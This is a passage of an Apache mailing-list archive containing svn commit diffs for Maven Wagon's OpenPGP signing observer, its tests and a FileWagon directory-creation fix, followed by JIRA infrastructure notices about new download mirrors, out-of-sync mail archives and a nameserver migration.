actualSignature = signer.finish(); + } + catch ( OpenPgpException e ) + { + // TODO: record the error in some way + } + catch ( IOException e ) + { + // TODO: record the error in some way + } + } + + public byte[] getActualSignature() + { + return actualSignature; + } +} Propchange: maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignerObserver.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: maven/wagon/trunk/wagon-openpgp/src/main/java/org/apache/maven/wagon/openpgp/WagonOpenPgpSignerObserver.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Added: maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/WagonOpenPgpObserverTest.java URL: http://svn.apache.org/viewcvs/maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/WagonOpenPgpObserverTest.java?rev=355292&view=auto ============================================================================== --- maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/WagonOpenPgpObserverTest.java (added) +++ maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/WagonOpenPgpObserverTest.java Thu Dec 8 16:20:31 2005 @@ -0,0 +1,122 @@ +package org.apache.maven.wagon.openpgp; + +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +import org.apache.commons.openpgp.BouncyCastleKeyRing; +import org.apache.commons.openpgp.BouncyCastleOpenPgpSignatureVerifier; +import org.apache.commons.openpgp.KeyRing; +import org.apache.commons.openpgp.OpenPgpSignatureVerifier; +import org.apache.commons.openpgp.SignatureStatus; +import org.apache.maven.wagon.FileTestUtils; +import org.apache.maven.wagon.Wagon; +import org.apache.maven.wagon.repository.Repository; +import org.codehaus.plexus.PlexusTestCase; + +import java.io.ByteArrayInputStream; +import java.io.File; + +/** + * Test the wagon observer for open pgp signatures. + * + * @author <a href="mailto:[email protected]">Brett Porter</a> + */ +public class WagonOpenPgpObserverTest + extends PlexusTestCase +{ + private String keyId = "A7D16BD4"; + + private static final String PASSWORD = "cop"; + + private KeyRing keyRing; + + protected void setUp() + throws Exception + { + super.setUp(); + + keyRing = new BouncyCastleKeyRing( getClass().getResourceAsStream( "/secring.gpg" ), + getClass().getResourceAsStream( "/pubring.gpg" ), PASSWORD.toCharArray() ); + } + + public void testSign() + throws Exception + { + WagonOpenPgpSignerObserver observer = new WagonOpenPgpSignerObserver( keyId, keyRing, false ); + + Wagon wagon = (Wagon) lookup( Wagon.ROLE, "file" ); + + wagon.addTransferListener( observer ); + + File tempDir = new File( FileTestUtils.getTestOutputDir(), "openpgp-repo" ); + tempDir.mkdirs(); + tempDir.deleteOnExit(); + + Repository repository = new Repository( "test", tempDir.toURL().toString() ); + + wagon.connect( repository ); + + // TODO: use streams when available + wagon.put( getTestFile( "src/test/resources/test-input.txt" ), "test-input.txt" ); + + byte[] signature = observer.getActualSignature(); + + wagon.removeTransferListener( observer ); + + wagon.disconnect(); + + // check signature + OpenPgpSignatureVerifier verifier = new BouncyCastleOpenPgpSignatureVerifier(); + SignatureStatus status = verifier.verifyDetachedSignature( getClass().getResourceAsStream( "/test-input.txt" ), + new ByteArrayInputStream( signature ), keyRing, + false ); + + assertNotNull( "check we got a status", status ); + assertTrue( "check it was successful", status.isValid() ); + } + + public void testVerify() + throws Exception + { + WagonOpenPgpSignatureVerifierObserver observer = new WagonOpenPgpSignatureVerifierObserver( + getClass().getResourceAsStream( "/test-signature.bpg" ), keyRing, false ); + + Wagon wagon = (Wagon) lookup( Wagon.ROLE, "file" ); + + wagon.addTransferListener( observer ); + + File tempDir = new File( FileTestUtils.getTestOutputDir(), "openpgp-repo" ); + tempDir.mkdirs(); + tempDir.deleteOnExit(); + + Repository repository = new Repository( "test", getTestFile( "src/test/resources" ).toURL().toString() ); + + wagon.connect( repository ); + + // TODO: use streams when available + wagon.get( "test-input.txt", new File( tempDir, "test-input.txt" ) ); + + SignatureStatus status = observer.getStatus(); + + assertNotNull( "check we got a status", status ); + assertTrue( "check it was successful", status.isValid() ); + + wagon.removeTransferListener( observer ); + + wagon.disconnect(); + } + +} Propchange: maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/WagonOpenPgpObserverTest.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: maven/wagon/trunk/wagon-openpgp/src/test/java/org/apache/maven/wagon/openpgp/WagonOpenPgpObserverTest.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Added: maven/wagon/trunk/wagon-provider-api/src/main/java/org/apache/maven/wagon/observers/AbstractTransferListener.java URL: http://svn.apache.org/viewcvs/maven/wagon/trunk/wagon-provider-api/src/main/java/org/apache/maven/wagon/observers/AbstractTransferListener.java?rev=355292&view=auto ============================================================================== --- maven/wagon/trunk/wagon-provider-api/src/main/java/org/apache/maven/wagon/observers/AbstractTransferListener.java (added) +++ maven/wagon/trunk/wagon-provider-api/src/main/java/org/apache/maven/wagon/observers/AbstractTransferListener.java Thu Dec 8 16:20:31 2005 @@ -0,0 +1,60 @@ +package org.apache.maven.wagon.observers; + +/* + * Copyright 2001-2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +import org.apache.maven.wagon.events.TransferEvent; +import org.apache.maven.wagon.events.TransferListener; + +/** + * TransferListeners which computes MD5 checksum on the fly when files are transfered. + * + * @author <a href="[email protected]">Michal Maczka</a> + * @version $Id$ + */ +public abstract class AbstractTransferListener + implements TransferListener +{ + public void transferInitiated( TransferEvent transferEvent ) + { + } + + /** + * @see org.apache.maven.wagon.events.TransferListener#transferStarted(org.apache.maven.wagon.events.TransferEvent) + */ + public void transferStarted( TransferEvent transferEvent ) + { + } + + /** + * @see org.apache.maven.wagon.events.TransferListener#transferProgress(org.apache.maven.wagon.events.TransferEvent,byte[],int) + */ + public void transferProgress( TransferEvent transferEvent, byte[] buffer, int length ) + { + } + + public void transferCompleted( TransferEvent transferEvent ) + { + } + + public void transferError( TransferEvent transferEvent ) + { + } + + public void debug( String message ) + { + } +} Propchange: maven/wagon/trunk/wagon-provider-api/src/main/java/org/apache/maven/wagon/observers/AbstractTransferListener.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: maven/wagon/trunk/wagon-provider-api/src/main/java/org/apache/maven/wagon/observers/AbstractTransferListener.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Dec 31 14:48:41 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46298 invoked from network); 31 Dec 2005 14:48:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 31 Dec 2005 14:48:41 -0000 Received: (qmail 22721 invoked by uid 500); 31 Dec 2005 14:48:40 -0000 Delivered-To: [email protected] Received: (qmail 22699 invoked by uid 500); 31 Dec 2005 14:48:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <wagon-commits.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 22688 invoked by uid 99); 31 Dec 2005 14:48:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 31 Dec 2005 06:48:40 -0800 X-ASF-Spam-Status: No, hits=-9.4 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sat, 31 Dec 2005 06:48:39 -0800 Received: (qmail 46259 invoked by uid 65534); 31 Dec 2005 14:48:19 -0000 Message-ID: <[email protected]> Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r360284 - /maven/wagon/trunk/wagon-providers/wagon-file/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java Date: Sat, 31 Dec 2005 14:48:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.5 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: trygvis Date: Sat Dec 31 06:47:45 2005 New Revision: 360284 URL: http://svn.apache.org/viewcvs?rev=360284&view=rev Log: o Adding a check to make sure that the parent directories actually was created. (Stupid File.mkdirs() that won't throw an IOException if the creation failed) Modified: maven/wagon/trunk/wagon-providers/wagon-file/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java Modified: maven/wagon/trunk/wagon-providers/wagon-file/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java URL: http://svn.apache.org/viewcvs/maven/wagon/trunk/wagon-providers/wagon-file/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java?rev=360284&r1=360283&r2=360284&view=diff ============================================================================== --- maven/wagon/trunk/wagon-providers/wagon-file/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java (original) +++ maven/wagon/trunk/wagon-providers/wagon-file/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java Sat Dec 31 06:47:45 2005 @@ -43,8 +43,6 @@ public class FileWagon extends StreamWagon { - - // get public void fillInputData( InputData inputData ) throws TransferFailedException, ResourceDoesNotExistException { @@ -74,7 +72,6 @@ } } - // put public void fillOutputData( OutputData outputData ) throws TransferFailedException { @@ -110,7 +107,11 @@ destinationDirectory = StringUtils.replace( destinationDirectory, "\\", "/" ); File path = new File( basedir, destinationDirectory ); - path.mkdirs(); + + if ( !path.mkdirs() ) + { + throw new TransferFailedException( "Could not make directory '" + path.getAbsolutePath() + "'." ); + } try { --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Fri Jun 02 01:50:31 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 21328 invoked from network); 2 Jun 2006 01:50:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2006 01:50:30 -0000 Received: (qmail 72440 invoked by uid 500); 2 Jun 2006 01:50:28 -0000 Delivered-To: [email protected] Received: (qmail 72076 invoked by uid 500); 2 Jun 2006 01:50:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71843 invoked by uid 99); 2 Jun 2006 01:50:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 18:50:25 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 18:50:24 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4AE457141E1 for <[email protected]>; Fri, 2 Jun 2006 01:49:31 +0000 (GMT) Message-ID: <9824324.1149212971303.JavaMail.jira@brutus> Date: Fri, 2 Jun 2006 01:49:31 +0000 (GMT+00:00) From: "Phil Evans (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-827) New mirror - please add MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New mirror - please add ----------------------- Key: INFRA-827 URL: http://issues.apache.org/jira/browse/INFRA-827 Project: Infrastructure Type: Task Security: public (Regular issues) Components: Mirrors Reporter: Phil Evans URL of mirror: http://mirrors.probonic.com/apache/ Country: United States, TX Contact email: [email protected] Update frequency: 4 times a day Rsync repository used: rsync.apache.org Approx. bandwidth: 100mbit I have configured my HTTP server as requested: yes I have subscribed to the mirror maintainers mailing list: yes URL to 100x34 logo: http://www.probonic.com/images/logo10034.gif Link for image: http://www.probonic.com Thank you. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 02 01:54:33 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22448 invoked from network); 2 Jun 2006 01:54:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2006 01:54:33 -0000 Received: (qmail 74532 invoked by uid 500); 2 Jun 2006 01:54:29 -0000 Delivered-To: [email protected] Received: (qmail 74235 invoked by uid 500); 2 Jun 2006 01:54:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74224 invoked by uid 99); 2 Jun 2006 01:54:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 18:54:28 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 18:54:27 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D77FB7141E0 for <[email protected]>; Fri, 2 Jun 2006 01:53:33 +0000 (GMT) Message-ID: <8685798.1149213213877.JavaMail.jira@brutus> Date: Fri, 2 Jun 2006 01:53:33 +0000 (GMT+00:00) From: "Phil Evans (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-827) New mirror - please add In-Reply-To: <9824324.1149212971303.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-827?page=all ] Phil Evans updated INFRA-827: ----------------------------- Description: URL of mirror: http://mirrors.probonic.com/apache/ ftp://mirrors.probonic.com/apache/ Country: United States, TX Contact email: [email protected] Update frequency: 4 times a day Rsync repository used: rsync.apache.org Approx. bandwidth: 100mbit I have configured my HTTP server as requested: yes I have subscribed to the mirror maintainers mailing list: yes URL to 100x34 logo: http://www.probonic.com/images/logo10034.gif Link for image: http://www.probonic.com Thank you. was: URL of mirror: http://mirrors.probonic.com/apache/ Country: United States, TX Contact email: [email protected] Update frequency: 4 times a day Rsync repository used: rsync.apache.org Approx. bandwidth: 100mbit I have configured my HTTP server as requested: yes I have subscribed to the mirror maintainers mailing list: yes URL to 100x34 logo: http://www.probonic.com/images/logo10034.gif Link for image: http://www.probonic.com Thank you. > New mirror - please add > ----------------------- > > Key: INFRA-827 > URL: http://issues.apache.org/jira/browse/INFRA-827 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Reporter: Phil Evans > > URL of mirror: http://mirrors.probonic.com/apache/ ftp://mirrors.probonic.com/apache/ > Country: United States, TX > Contact email: [email protected] > Update frequency: 4 times a day > Rsync repository used: rsync.apache.org > Approx. bandwidth: 100mbit > I have configured my HTTP server as requested: yes > I have subscribed to the mirror maintainers mailing list: yes > URL to 100x34 logo: http://www.probonic.com/images/logo10034.gif > Link for image: http://www.probonic.com > Thank you. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 02 04:15:46 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46617 invoked from network); 2 Jun 2006 04:15:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2006 04:15:44 -0000 Received: (qmail 97837 invoked by uid 500); 2 Jun 2006 04:15:42 -0000 Delivered-To: [email protected] Received: (qmail 97487 invoked by uid 500); 2 Jun 2006 04:15:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97475 invoked by uid 99); 2 Jun 2006 04:15:40 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 21:15:40 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Jun 2006 21:15:38 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A303D7141D1 for <[email protected]>; Fri, 2 Jun 2006 04:14:44 +0000 (GMT) Message-ID: <7528335.1149221684649.JavaMail.jira@brutus> Date: Fri, 2 Jun 2006 04:14:44 +0000 (GMT+00:00) From: "Federico Alvarez (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-800) New mirror in Argentina In-Reply-To: <20775586.1147380034175.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-800?page=comments#action_12414350 ] Federico Alvarez commented on INFRA-800: ---------------------------------------- Dear Joshua Silve, THE SERVER IS READY FOR BE OFFICIAL MIRROR! http://apache.wnpower.com I waiting your response... Thanks! > New mirror in Argentina > ----------------------- > > Key: INFRA-800 > URL: http://issues.apache.org/jira/browse/INFRA-800 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Reporter: Federico Alvarez > > URL of mirror: http://apache.wnpower.com > Country where the mirror is located: Argentina > Contact email address: [email protected] > Update frequency: daily at 1:50 and 13:50 hs > Rsync repository used: rsync.apache.org > Approximate bandwidth: 100 Mbit > I have configured my HTTP server as requested: Yes > I have subscribed to the mirror maintainers mailing list: Yes > Logo: http://www.wnpower.com/mirror_apache.gif > URL: http://www.wnpower.com -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 03 00:54:34 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84769 invoked from network); 3 Jun 2006 00:54:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jun 2006 00:54:32 -0000 Received: (qmail 74899 invoked by uid 500); 3 Jun 2006 00:54:27 -0000 Delivered-To: [email protected] Received: (qmail 74574 invoked by uid 500); 3 Jun 2006 00:54:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74562 invoked by uid 99); 3 Jun 2006 00:54:25 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Jun 2006 17:54:25 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 02 Jun 2006 17:54:25 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 26A0C714022 for <[email protected]>; Sat, 3 Jun 2006 00:53:30 +0000 (GMT) Message-ID: <8775588.1149296010139.JavaMail.jira@brutus> Date: Sat, 3 Jun 2006 00:53:30 +0000 (GMT+00:00) From: "Joe Schaefer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-826) Mail archives out of sync In-Reply-To: <31617317.1149088589766.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-826?page=comments#action_12414547 ] Joe Schaefer commented on INFRA-826: ------------------------------------ I think I fixed it by forcing mod-mbox-util to always reindex the current month's posts. I did that by adding "touch $mboxfile; touch $mboxfile2" to the update-index script in jerenkrantz's directory. > Mail archives out of sync > ------------------------- > > Key: INFRA-826 > URL: http://issues.apache.org/jira/browse/INFRA-826 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: Mail Archives > Reporter: Ruediger Pluem > > Currently at least the following mail archives on mail-archives.apache.org are out of sync with the respective mailing lists: > [email protected] > [email protected] > [email protected] > They seem to be at least half a day behind. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 04 23:24:37 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49619 invoked from network); 4 Jun 2006 23:24:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Jun 2006 23:24:36 -0000 Received: (qmail 5933 invoked by uid 500); 4 Jun 2006 23:24:30 -0000 Delivered-To: [email protected] Received: (qmail 5662 invoked by uid 500); 4 Jun 2006 23:24:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5651 invoked by uid 99); 4 Jun 2006 23:24:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jun 2006 16:24:28 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Jun 2006 16:24:28 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4FDEA7141FA for <[email protected]>; Sun, 4 Jun 2006 23:23:30 +0000 (GMT) Message-ID: <9343860.1149463410303.JavaMail.jira@brutus> Date: Sun, 4 Jun 2006 23:23:30 +0000 (GMT+00:00) From: "Shane S Brath (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-828) New / Renewed Mirror in USA MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New / Renewed Mirror in USA --------------------------- Key: INFRA-828 URL: http://issues.apache.org/jira/browse/INFRA-828 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mirrors Reporter: Shane S Brath Priority: Minor URL of mirror : http://apache.mirrors.tds.net Country where the mirror is located : Madison, Wisconsin, USA Contact email address : [email protected] Update frequency : 2 times per day ( can me more if needed ) Rsync repository used : rsync.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist Approximate bandwidth : 1G/s I have configured my HTTP server as requested (yes/no) : yes I have subscribed to the mirror maintainers mailing list (yes/no) : yes had mirror running before, but had server problem and am now back and stable and ready to be re-added.. Shane. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 05 19:17:48 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85035 invoked from network); 5 Jun 2006 19:17:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2006 19:17:46 -0000 Received: (qmail 38709 invoked by uid 500); 5 Jun 2006 19:17:31 -0000 Delivered-To: [email protected] Received: (qmail 38375 invoked by uid 500); 5 Jun 2006 19:17:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38362 invoked by uid 99); 5 Jun 2006 19:17:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 12:17:29 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 12:17:29 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 236537141FA for <[email protected]>; Mon, 5 Jun 2006 19:16:30 +0000 (GMT) Message-ID: <25295722.1149534990141.JavaMail.jira@brutus> Date: Mon, 5 Jun 2006 19:16:30 +0000 (GMT+00:00) From: "Lars Eilebrecht (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-782) Need to switch nameservers for apachecon.com urgently In-Reply-To: <5684095.1146574846321.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-782?page=comments#action_12414825 ] Lars Eilebrecht commented on INFRA-782: --------------------------------------- The lame nameserver has been fixed, but we still need to migrate the domain to the regular ASF name servers. > Need to switch nameservers for apachecon.com urgently > ----------------------------------------------------- > > Key: INFRA-782 > URL: http://issues.apache.org/jira/browse/INFRA-782 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: DNS > Reporter: Lars Eilebrecht > Priority: Critical > > The apachecon.com is registered via dotser like all other apache domains, but we are still using the > old nameservers. > We have one lame nameserver (161.129.204.104 ns2.redhat.com) in the list and need to remove this > one urgently! > Removing the lame nameserver is just a workaround, the desired complete fix would be to completely switch all > nameservers for apachecon.com to the same nameservers we also use for our apache.org domains. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 06 01:23:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49171 invoked from network); 6 Jun 2006 01:23:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Jun 2006 01:23:39 -0000 Received: (qmail 35811 invoked by uid 500); 6 Jun 2006 01:23:32 -0000 Delivered-To: [email protected] Received: (qmail 35501 invoked by uid 500); 6 Jun 2006 01:23:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35442 invoked by uid 99); 6 Jun 2006 01:23:30 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 18:23:30 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Jun 2006 18:23:29 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C004271429F for <[email protected]>; Tue, 6 Jun 2006 01:22:29 +0000 (GMT) Message-ID: <26643223.1149556949768.JavaMail.jira@brutus> Date: Tue, 6 Jun 2006 01:22:29 +0000 (GMT+00:00) From: "Paul Querna (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-829) Create 